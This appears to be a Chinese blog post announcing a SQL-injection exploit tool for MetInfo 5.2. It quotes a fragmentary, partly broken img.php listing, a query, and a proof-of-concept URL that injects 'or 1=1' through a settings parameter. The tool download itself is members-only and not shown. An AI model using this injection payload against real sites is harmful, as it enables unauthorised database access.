metinfo 5.2 case-index.php 注入漏洞利用工具

漏洞文件: img.php

# MetInfo Enterprise Content Management System

# Copyright (C) MetInfo Co.,Ltd ( All rights

require_once '../include/';

$mdname = 'img';

$showname = 'showimg';

$dbname = $met_img;

$dbname_list = $met_img_list;

$mdmendy = 1;

$imgproduct = 'img';

require_once '../include/global/listmod.php';

$img_listnow = $modlistnow;

$img_list_new  = $md_list_new;

$img_class_new = $md_class_new;

$img_list_com  = $md_list_com;

$img_class_com = $md_class_com;

$img_class     = $md_class;

$img_list      = $md_list;

require_once '../public/php/';

include template('img');


# This program is an open source system, commercial use, please
consciously to purchase commercial license.

# Copyright (C) MetInfo Co., Ltd. ( All rights

http://localhost/case/?settings[met_img]=met_admin_table%20or%201=1 –

require_once substr(dirname(__FILE__), 0, -6).'';

require_once '../include/global/pseudo.php';





        $query="select * from $met_column where
module='$search_module' and (classtype=1 or releclass!=0) and
lang='$lang' order by no_order ASC,id ASC";




下载只允许会员下载 该文件只允许会员下载! 登录 | 注册

文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 0day
评论: 10 | 引用: 0 | 查看次数: 2675
  • 1
